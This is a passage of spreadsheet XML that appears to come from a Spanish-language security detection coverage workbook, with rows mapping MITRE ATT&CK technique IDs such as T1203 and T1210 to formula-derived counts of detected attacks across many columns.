      </c>
      <c r="CH37" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A38" s="4">
        <f t="shared" si="13"/>
        <v>36</v>
      </c>
      <c r="B38" s="4" t="str">
        <f>IFERROR(VLOOKUP(A38,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1203</v>
      </c>
      <c r="C38" s="493" t="str">
        <f>IFERROR(VLOOKUP(B38,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="D38" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B38)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E38" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B38,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>116</v>
      </c>
      <c r="F38" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (116)</v>
      </c>
      <c r="G38" s="292">
        <v>0</v>
      </c>
      <c r="H38" s="322">
        <v>0</v>
      </c>
      <c r="I38" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J38" s="12">
        <v>0</v>
      </c>
      <c r="K38" s="13">
        <v>0</v>
      </c>
      <c r="L38" s="394">
        <v>0</v>
      </c>
      <c r="M38" s="322">
        <v>5505</v>
      </c>
      <c r="N38" s="322">
        <v>112</v>
      </c>
      <c r="O38" s="322" t="str">
        <f t="shared" si="1"/>
        <v>112 (5505)</v>
      </c>
      <c r="P38" s="12">
        <v>1</v>
      </c>
      <c r="Q38" s="13">
        <v>1</v>
      </c>
      <c r="R38" s="394">
        <v>112</v>
      </c>
      <c r="S38" s="409">
        <v>5505</v>
      </c>
      <c r="T38" s="4">
        <v>112</v>
      </c>
      <c r="U38" s="322" t="str">
        <f t="shared" si="2"/>
        <v>112 (5505)</v>
      </c>
      <c r="V38" s="4">
        <v>1</v>
      </c>
      <c r="W38" s="13">
        <v>1</v>
      </c>
      <c r="X38" s="394">
        <v>112</v>
      </c>
      <c r="Y38" s="392">
        <v>16567</v>
      </c>
      <c r="Z38" s="392">
        <v>231</v>
      </c>
      <c r="AA38" s="322" t="str">
        <f t="shared" si="3"/>
        <v>231 (16567)</v>
      </c>
      <c r="AB38" s="392">
        <v>3</v>
      </c>
      <c r="AC38" s="16">
        <v>1</v>
      </c>
      <c r="AD38" s="394">
        <v>115</v>
      </c>
      <c r="AE38" s="392">
        <v>5509</v>
      </c>
      <c r="AF38" s="392">
        <v>116</v>
      </c>
      <c r="AG38" s="322" t="str">
        <f t="shared" si="4"/>
        <v>116 (5509)</v>
      </c>
      <c r="AH38" s="392">
        <v>2</v>
      </c>
      <c r="AI38" s="16">
        <v>1</v>
      </c>
      <c r="AJ38" s="394">
        <v>112</v>
      </c>
      <c r="AK38" s="392">
        <v>22076</v>
      </c>
      <c r="AL38" s="392">
        <v>347</v>
      </c>
      <c r="AM38" s="322" t="str">
        <f t="shared" si="5"/>
        <v>347 (22076)</v>
      </c>
      <c r="AN38" s="392">
        <v>5</v>
      </c>
      <c r="AO38" s="16">
        <v>1</v>
      </c>
      <c r="AP38" s="394">
        <v>115</v>
      </c>
      <c r="AQ38" s="292">
        <v>0</v>
      </c>
      <c r="AR38" s="322">
        <v>0</v>
      </c>
      <c r="AS38" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT38" s="12">
        <v>0</v>
      </c>
      <c r="AU38" s="13">
        <v>0</v>
      </c>
      <c r="AV38" s="394">
        <v>0</v>
      </c>
      <c r="AW38" s="392">
        <v>0</v>
      </c>
      <c r="AX38" s="392">
        <v>0</v>
      </c>
      <c r="AY38" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ38" s="4">
        <v>0</v>
      </c>
      <c r="BA38" s="16">
        <v>0</v>
      </c>
      <c r="BB38" s="394">
        <v>0</v>
      </c>
      <c r="BC38" s="292">
        <v>5505</v>
      </c>
      <c r="BD38" s="322">
        <v>112</v>
      </c>
      <c r="BE38" s="322" t="str">
        <f t="shared" si="8"/>
        <v>112 (5505)</v>
      </c>
      <c r="BF38" s="12">
        <v>1</v>
      </c>
      <c r="BG38" s="13">
        <v>1</v>
      </c>
      <c r="BH38" s="394">
        <v>112</v>
      </c>
      <c r="BI38" s="292">
        <v>0</v>
      </c>
      <c r="BJ38" s="322">
        <v>0</v>
      </c>
      <c r="BK38" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL38" s="12">
        <v>0</v>
      </c>
      <c r="BM38" s="13">
        <v>0</v>
      </c>
      <c r="BN38" s="394">
        <v>0</v>
      </c>
      <c r="BO38" s="292">
        <v>115</v>
      </c>
      <c r="BP38" s="322">
        <v>115</v>
      </c>
      <c r="BQ38" s="322" t="str">
        <f t="shared" si="10"/>
        <v>115 (115)</v>
      </c>
      <c r="BR38" s="12">
        <v>0</v>
      </c>
      <c r="BS38" s="12">
        <v>1</v>
      </c>
      <c r="BT38" s="13">
        <v>1</v>
      </c>
      <c r="BU38" s="394">
        <v>115</v>
      </c>
      <c r="BV38" s="292">
        <v>0</v>
      </c>
      <c r="BW38" s="322">
        <v>0</v>
      </c>
      <c r="BX38" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY38" s="12">
        <v>0</v>
      </c>
      <c r="BZ38" s="13">
        <v>0</v>
      </c>
      <c r="CA38" s="394">
        <v>0</v>
      </c>
      <c r="CB38" s="292">
        <v>213</v>
      </c>
      <c r="CC38" s="322">
        <v>112</v>
      </c>
      <c r="CD38" s="322" t="str">
        <f t="shared" si="12"/>
        <v>112 (213)</v>
      </c>
      <c r="CE38" s="12">
        <v>0</v>
      </c>
      <c r="CF38" s="12">
        <v>1</v>
      </c>
      <c r="CG38" s="13">
        <v>1</v>
      </c>
      <c r="CH38" s="394">
        <v>112</v>
      </c>
    </row>
    <row r="39" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A39" s="4">
        <f t="shared" si="13"/>
        <v>37</v>
      </c>
      <c r="B39" s="4" t="str">
        <f>IFERROR(VLOOKUP(A39,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1204</v>
      </c>
      <c r="C39" s="493" t="str">
        <f>IFERROR(VLOOKUP(B39,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>User Execution</v>
      </c>
      <c r="D39" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B39)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E39" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B39,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F39" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G39" s="292">
        <v>0</v>
      </c>
      <c r="H39" s="322">
        <v>0</v>
      </c>
      <c r="I39" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J39" s="12">
        <v>0</v>
      </c>
      <c r="K39" s="13">
        <v>0</v>
      </c>
      <c r="L39" s="394">
        <v>0</v>
      </c>
      <c r="M39" s="322">
        <v>0</v>
      </c>
      <c r="N39" s="322">
        <v>0</v>
      </c>
      <c r="O39" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P39" s="12">
        <v>0</v>
      </c>
      <c r="Q39" s="13">
        <v>0</v>
      </c>
      <c r="R39" s="394">
        <v>0</v>
      </c>
      <c r="S39" s="409">
        <v>0</v>
      </c>
      <c r="T39" s="4">
        <v>0</v>
      </c>
      <c r="U39" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V39" s="4">
        <v>0</v>
      </c>
      <c r="W39" s="13">
        <v>0</v>
      </c>
      <c r="X39" s="394">
        <v>0</v>
      </c>
      <c r="Y39" s="392">
        <v>0</v>
      </c>
      <c r="Z39" s="392">
        <v>0</v>
      </c>
      <c r="AA39" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB39" s="392">
        <v>0</v>
      </c>
      <c r="AC39" s="16">
        <v>0</v>
      </c>
      <c r="AD39" s="394">
        <v>0</v>
      </c>
      <c r="AE39" s="392">
        <v>0</v>
      </c>
      <c r="AF39" s="392">
        <v>0</v>
      </c>
      <c r="AG39" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH39" s="392">
        <v>0</v>
      </c>
      <c r="AI39" s="16">
        <v>0</v>
      </c>
      <c r="AJ39" s="394">
        <v>0</v>
      </c>
      <c r="AK39" s="392">
        <v>0</v>
      </c>
      <c r="AL39" s="392">
        <v>0</v>
      </c>
      <c r="AM39" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN39" s="392">
        <v>0</v>
      </c>
      <c r="AO39" s="16">
        <v>0</v>
      </c>
      <c r="AP39" s="394">
        <v>0</v>
      </c>
      <c r="AQ39" s="292">
        <v>0</v>
      </c>
      <c r="AR39" s="322">
        <v>0</v>
      </c>
      <c r="AS39" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT39" s="12">
        <v>0</v>
      </c>
      <c r="AU39" s="13">
        <v>0</v>
      </c>
      <c r="AV39" s="394">
        <v>0</v>
      </c>
      <c r="AW39" s="392">
        <v>0</v>
      </c>
      <c r="AX39" s="392">
        <v>0</v>
      </c>
      <c r="AY39" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ39" s="4">
        <v>0</v>
      </c>
      <c r="BA39" s="16">
        <v>0</v>
      </c>
      <c r="BB39" s="394">
        <v>0</v>
      </c>
      <c r="BC39" s="292">
        <v>0</v>
      </c>
      <c r="BD39" s="322">
        <v>0</v>
      </c>
      <c r="BE39" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF39" s="12">
        <v>0</v>
      </c>
      <c r="BG39" s="13">
        <v>0</v>
      </c>
      <c r="BH39" s="394">
        <v>0</v>
      </c>
      <c r="BI39" s="292">
        <v>0</v>
      </c>
      <c r="BJ39" s="322">
        <v>0</v>
      </c>
      <c r="BK39" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL39" s="12">
        <v>0</v>
      </c>
      <c r="BM39" s="13">
        <v>0</v>
      </c>
      <c r="BN39" s="394">
        <v>0</v>
      </c>
      <c r="BO39" s="292">
        <v>0</v>
      </c>
      <c r="BP39" s="322">
        <v>0</v>
      </c>
      <c r="BQ39" s="322" t="str">
        <f t="shared" si="10"/>
        <v>0 (0)</v>
      </c>
      <c r="BR39" s="12">
        <v>0</v>
      </c>
      <c r="BS39" s="12">
        <v>0</v>
      </c>
      <c r="BT39" s="13">
        <v>0</v>
      </c>
      <c r="BU39" s="394">
        <v>0</v>
      </c>
      <c r="BV39" s="292">
        <v>0</v>
      </c>
      <c r="BW39" s="322">
        <v>0</v>
      </c>
      <c r="BX39" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY39" s="12">
        <v>0</v>
      </c>
      <c r="BZ39" s="13">
        <v>0</v>
      </c>
      <c r="CA39" s="394">
        <v>0</v>
      </c>
      <c r="CB39" s="292">
        <v>0</v>
      </c>
      <c r="CC39" s="322">
        <v>0</v>
      </c>
      <c r="CD39" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE39" s="12">
        <v>0</v>
      </c>
      <c r="CF39" s="12">
        <v>0</v>
      </c>
      <c r="CG39" s="13">
        <v>0</v>
      </c>
      <c r="CH39" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A40" s="4">
        <f t="shared" si="13"/>
        <v>38</v>
      </c>
      <c r="B40" s="4" t="str">
        <f>IFERROR(VLOOKUP(A40,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1205</v>
      </c>
      <c r="C40" s="493" t="str">
        <f>IFERROR(VLOOKUP(B40,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="D40" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B40)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E40" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B40,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F40" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (5)</v>
      </c>
      <c r="G40" s="292">
        <v>0</v>
      </c>
      <c r="H40" s="322">
        <v>0</v>
      </c>
      <c r="I40" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J40" s="12">
        <v>0</v>
      </c>
      <c r="K40" s="13">
        <v>0</v>
      </c>
      <c r="L40" s="394">
        <v>0</v>
      </c>
      <c r="M40" s="322">
        <v>0</v>
      </c>
      <c r="N40" s="322">
        <v>0</v>
      </c>
      <c r="O40" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P40" s="12">
        <v>0</v>
      </c>
      <c r="Q40" s="13">
        <v>0</v>
      </c>
      <c r="R40" s="394">
        <v>0</v>
      </c>
      <c r="S40" s="409">
        <v>0</v>
      </c>
      <c r="T40" s="4">
        <v>0</v>
      </c>
      <c r="U40" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V40" s="4">
        <v>0</v>
      </c>
      <c r="W40" s="13">
        <v>0</v>
      </c>
      <c r="X40" s="394">
        <v>0</v>
      </c>
      <c r="Y40" s="392">
        <v>1</v>
      </c>
      <c r="Z40" s="392">
        <v>1</v>
      </c>
      <c r="AA40" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (1)</v>
      </c>
      <c r="AB40" s="392">
        <v>1</v>
      </c>
      <c r="AC40" s="16">
        <v>1</v>
      </c>
      <c r="AD40" s="394">
        <v>1</v>
      </c>
      <c r="AE40" s="392">
        <v>0</v>
      </c>
      <c r="AF40" s="392">
        <v>0</v>
      </c>
      <c r="AG40" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH40" s="392">
        <v>0</v>
      </c>
      <c r="AI40" s="16">
        <v>0</v>
      </c>
      <c r="AJ40" s="394">
        <v>0</v>
      </c>
      <c r="AK40" s="392">
        <v>1</v>
      </c>
      <c r="AL40" s="392">
        <v>1</v>
      </c>
      <c r="AM40" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1 (1)</v>
      </c>
      <c r="AN40" s="392">
        <v>1</v>
      </c>
      <c r="AO40" s="16">
        <v>1</v>
      </c>
      <c r="AP40" s="394">
        <v>1</v>
      </c>
      <c r="AQ40" s="292">
        <v>0</v>
      </c>
      <c r="AR40" s="322">
        <v>0</v>
      </c>
      <c r="AS40" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT40" s="12">
        <v>0</v>
      </c>
      <c r="AU40" s="13">
        <v>0</v>
      </c>
      <c r="AV40" s="394">
        <v>0</v>
      </c>
      <c r="AW40" s="392">
        <v>1</v>
      </c>
      <c r="AX40" s="392">
        <v>1</v>
      </c>
      <c r="AY40" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ40" s="4">
        <v>1</v>
      </c>
      <c r="BA40" s="16">
        <v>1</v>
      </c>
      <c r="BB40" s="394">
        <v>1</v>
      </c>
      <c r="BC40" s="292">
        <v>1</v>
      </c>
      <c r="BD40" s="322">
        <v>1</v>
      </c>
      <c r="BE40" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (1)</v>
      </c>
      <c r="BF40" s="12">
        <v>1</v>
      </c>
      <c r="BG40" s="13">
        <v>1</v>
      </c>
      <c r="BH40" s="394">
        <v>1</v>
      </c>
      <c r="BI40" s="292">
        <v>1</v>
      </c>
      <c r="BJ40" s="322">
        <v>1</v>
      </c>
      <c r="BK40" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL40" s="12">
        <v>1</v>
      </c>
      <c r="BM40" s="13">
        <v>1</v>
      </c>
      <c r="BN40" s="394">
        <v>1</v>
      </c>
      <c r="BO40" s="292">
        <v>2</v>
      </c>
      <c r="BP40" s="322">
        <v>2</v>
      </c>
      <c r="BQ40" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR40" s="12">
        <v>1</v>
      </c>
      <c r="BS40" s="12">
        <v>1</v>
      </c>
      <c r="BT40" s="13">
        <v>1</v>
      </c>
      <c r="BU40" s="394">
        <v>1</v>
      </c>
      <c r="BV40" s="292">
        <v>0</v>
      </c>
      <c r="BW40" s="322">
        <v>0</v>
      </c>
      <c r="BX40" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY40" s="12">
        <v>0</v>
      </c>
      <c r="BZ40" s="13">
        <v>0</v>
      </c>
      <c r="CA40" s="394">
        <v>0</v>
      </c>
      <c r="CB40" s="292">
        <v>1</v>
      </c>
      <c r="CC40" s="322">
        <v>1</v>
      </c>
      <c r="CD40" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (1)</v>
      </c>
      <c r="CE40" s="12">
        <v>0</v>
      </c>
      <c r="CF40" s="12">
        <v>1</v>
      </c>
      <c r="CG40" s="13">
        <v>1</v>
      </c>
      <c r="CH40" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A41" s="4">
        <f t="shared" si="13"/>
        <v>39</v>
      </c>
      <c r="B41" s="4" t="str">
        <f>IFERROR(VLOOKUP(A41,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1207</v>
      </c>
      <c r="C41" s="493" t="str">
        <f>IFERROR(VLOOKUP(B41,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="D41" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B41)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E41" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B41,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>88</v>
      </c>
      <c r="F41" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (88)</v>
      </c>
      <c r="G41" s="292">
        <v>0</v>
      </c>
      <c r="H41" s="322">
        <v>0</v>
      </c>
      <c r="I41" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J41" s="12">
        <v>0</v>
      </c>
      <c r="K41" s="13">
        <v>0</v>
      </c>
      <c r="L41" s="394">
        <v>0</v>
      </c>
      <c r="M41" s="322">
        <v>0</v>
      </c>
      <c r="N41" s="322">
        <v>0</v>
      </c>
      <c r="O41" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P41" s="12">
        <v>0</v>
      </c>
      <c r="Q41" s="13">
        <v>0</v>
      </c>
      <c r="R41" s="394">
        <v>0</v>
      </c>
      <c r="S41" s="409">
        <v>0</v>
      </c>
      <c r="T41" s="4">
        <v>0</v>
      </c>
      <c r="U41" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V41" s="4">
        <v>0</v>
      </c>
      <c r="W41" s="13">
        <v>0</v>
      </c>
      <c r="X41" s="394">
        <v>0</v>
      </c>
      <c r="Y41" s="392">
        <v>32</v>
      </c>
      <c r="Z41" s="392">
        <v>22</v>
      </c>
      <c r="AA41" s="322" t="str">
        <f t="shared" si="3"/>
        <v>22 (32)</v>
      </c>
      <c r="AB41" s="392">
        <v>2</v>
      </c>
      <c r="AC41" s="16">
        <v>1</v>
      </c>
      <c r="AD41" s="394">
        <v>22</v>
      </c>
      <c r="AE41" s="392">
        <v>0</v>
      </c>
      <c r="AF41" s="392">
        <v>0</v>
      </c>
      <c r="AG41" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH41" s="392">
        <v>0</v>
      </c>
      <c r="AI41" s="16">
        <v>0</v>
      </c>
      <c r="AJ41" s="394">
        <v>0</v>
      </c>
      <c r="AK41" s="392">
        <v>32</v>
      </c>
      <c r="AL41" s="392">
        <v>22</v>
      </c>
      <c r="AM41" s="322" t="str">
        <f t="shared" si="5"/>
        <v>22 (32)</v>
      </c>
      <c r="AN41" s="392">
        <v>2</v>
      </c>
      <c r="AO41" s="16">
        <v>1</v>
      </c>
      <c r="AP41" s="394">
        <v>22</v>
      </c>
      <c r="AQ41" s="292">
        <v>0</v>
      </c>
      <c r="AR41" s="322">
        <v>0</v>
      </c>
      <c r="AS41" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT41" s="12">
        <v>0</v>
      </c>
      <c r="AU41" s="13">
        <v>0</v>
      </c>
      <c r="AV41" s="394">
        <v>0</v>
      </c>
      <c r="AW41" s="392">
        <v>0</v>
      </c>
      <c r="AX41" s="392">
        <v>0</v>
      </c>
      <c r="AY41" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ41" s="4">
        <v>0</v>
      </c>
      <c r="BA41" s="16">
        <v>0</v>
      </c>
      <c r="BB41" s="394">
        <v>0</v>
      </c>
      <c r="BC41" s="292">
        <v>0</v>
      </c>
      <c r="BD41" s="322">
        <v>0</v>
      </c>
      <c r="BE41" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF41" s="12">
        <v>0</v>
      </c>
      <c r="BG41" s="13">
        <v>0</v>
      </c>
      <c r="BH41" s="394">
        <v>0</v>
      </c>
      <c r="BI41" s="292">
        <v>0</v>
      </c>
      <c r="BJ41" s="322">
        <v>0</v>
      </c>
      <c r="BK41" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL41" s="12">
        <v>0</v>
      </c>
      <c r="BM41" s="13">
        <v>0</v>
      </c>
      <c r="BN41" s="394">
        <v>0</v>
      </c>
      <c r="BO41" s="292">
        <v>74</v>
      </c>
      <c r="BP41" s="322">
        <v>74</v>
      </c>
      <c r="BQ41" s="322" t="str">
        <f t="shared" si="10"/>
        <v>74 (74)</v>
      </c>
      <c r="BR41" s="12">
        <v>0</v>
      </c>
      <c r="BS41" s="12">
        <v>7</v>
      </c>
      <c r="BT41" s="13">
        <v>1</v>
      </c>
      <c r="BU41" s="394">
        <v>73</v>
      </c>
      <c r="BV41" s="292">
        <v>0</v>
      </c>
      <c r="BW41" s="322">
        <v>0</v>
      </c>
      <c r="BX41" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY41" s="12">
        <v>0</v>
      </c>
      <c r="BZ41" s="13">
        <v>0</v>
      </c>
      <c r="CA41" s="394">
        <v>0</v>
      </c>
      <c r="CB41" s="292">
        <v>0</v>
      </c>
      <c r="CC41" s="322">
        <v>0</v>
      </c>
      <c r="CD41" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE41" s="12">
        <v>0</v>
      </c>
      <c r="CF41" s="12">
        <v>0</v>
      </c>
      <c r="CG41" s="13">
        <v>0</v>
      </c>
      <c r="CH41" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:86" ht="15" customHeight="1">
      <c r="A42" s="4">
        <f t="shared" si="13"/>
        <v>40</v>
      </c>
      <c r="B42" s="4" t="str">
        <f>IFERROR(VLOOKUP(A42,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1210</v>
      </c>
      <c r="C42" s="493" t="str">
        <f>IFERROR(VLOOKUP(B42,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="D42" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B42)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>3</v>
      </c>
      <c r="E42" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B42,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>287</v>
      </c>
      <c r="F42" s="579" t="str">
        <f t="shared" si="14"/>
        <v>3 (287)</v>
      </c>
      <c r="G42" s="292">
        <v>16</v>
      </c>
      <c r="H42" s="322">
        <v>2</v>
      </c>
      <c r="I42" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (16)</v>
      </c>
      <c r="J42" s="12">
        <v>2</v>
      </c>
      <c r="K42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="L42" s="394">
        <v>1</v>
      </c>
      <c r="M42" s="322">
        <v>6</v>
      </c>
      <c r="N42" s="322">
        <v>6</v>
      </c>
      <c r="O42" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P42" s="12">
        <v>6</v>
      </c>
      <c r="Q42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="R42" s="394">
        <v>3</v>
      </c>
      <c r="S42" s="409">
        <v>22</v>
      </c>
      <c r="T42" s="4">
        <v>8</v>
      </c>
      <c r="U42" s="322" t="str">
        <f t="shared" si="2"/>
        <v>8 (22)</v>
      </c>
      <c r="V42" s="4">
        <v>8</v>
      </c>
      <c r="W42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="X42" s="394">
        <v>3</v>
      </c>
      <c r="Y42" s="392">
        <v>26248</v>
      </c>
      <c r="Z42" s="392">
        <v>786</v>
      </c>
      <c r="AA42" s="322" t="str">
        <f t="shared" si="3"/>
        <v>786 (26248)</v>
      </c>
      <c r="AB42" s="392">
        <v>14</v>
      </c>
      <c r="AC42" s="16">
        <v>1</v>
      </c>
      <c r="AD42" s="394">
        <v>264</v>
      </c>
      <c r="AE42" s="392">
        <v>6556</v>
      </c>
      <c r="AF42" s="392">
        <v>265</v>
      </c>
      <c r="AG42" s="322" t="str">
        <f t="shared" si="4"/>
        <v>265 (6556)</v>
      </c>
      <c r="AH42" s="392">
        <v>9</v>
      </c>
      <c r="AI42" s="16">
        <v>0.66666666666666663</v>
      </c>
      <c r="AJ42" s="394">
        <v>260</v>
      </c>
      <c r="AK42" s="392">
        <v>32804</v>
      </c>
      <c r="AL42" s="392">
        <v>1051</v>
      </c>
      <c r="AM42" s="322" t="str">
        <f t="shared" si="5"/>
        <v>1051 (32804)</v>
      </c>
      <c r="AN42" s="392">
        <v>23</v>
      </c>
      <c r="AO42" s="16">
        <v>1</v>
      </c>
      <c r="AP42" s="394">
        <v>264</v>
      </c>
      <c r="AQ42" s="292">
        <v>16</v>
      </c>
      <c r="AR42" s="322">
        <v>2</v>
      </c>
      <c r="AS42" s="322" t="str">
        <f t="shared" si="6"/>
        <v>2 (16)</v>
      </c>
      <c r="AT42" s="12">
        <v>2</v>
      </c>
      <c r="AU42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="AV42" s="394">
        <v>1</v>
      </c>
      <c r="AW42" s="392">
        <v>29</v>
      </c>
      <c r="AX42" s="392">
        <v>3</v>
      </c>
      <c r="AY42" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (29)</v>
      </c>
      <c r="AZ42" s="4">
        <v>3</v>
      </c>
      <c r="BA42" s="16">
        <v>0.33333333333333331</v>
      </c>
      <c r="BB42" s="394">
        <v>1</v>
      </c>
      <c r="BC42" s="292">
        <v>35</v>
      </c>
      <c r="BD42" s="322">
        <v>9</v>
      </c>
      <c r="BE42" s="322" t="str">
        <f t="shared" si="8"/>
        <v>9 (35)</v>
      </c>
      <c r="BF42" s="12">
        <v>9</v>
      </c>
      <c r="BG42" s="13">
        <v>0.33333333333333331</v>
      </c>
      <c r="BH42" s="394">
        <v>3</v>
      </c>
      <c r="BI42" s="292">
        <v>6</v>
      </c>
      <c r="BJ42" s="322">
        <v>4</v>
      </c>
      <c r="BK42" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (6)</v>
      </c>
      <c r="BL42" s="12">
        <v>4</v>
      </c>
      <c r="BM42" s="13">
        <v>0.66666666666666663</v>
      </c>
      <c r="BN42" s="394">
        <v>4</v>
      </c>
      <c r="BO42" s="292">
        <v>292</v>
      </c>
      <c r="BP42" s="322">
        <v>290</v>
      </c>
      <c r="BQ42" s="322" t="str">
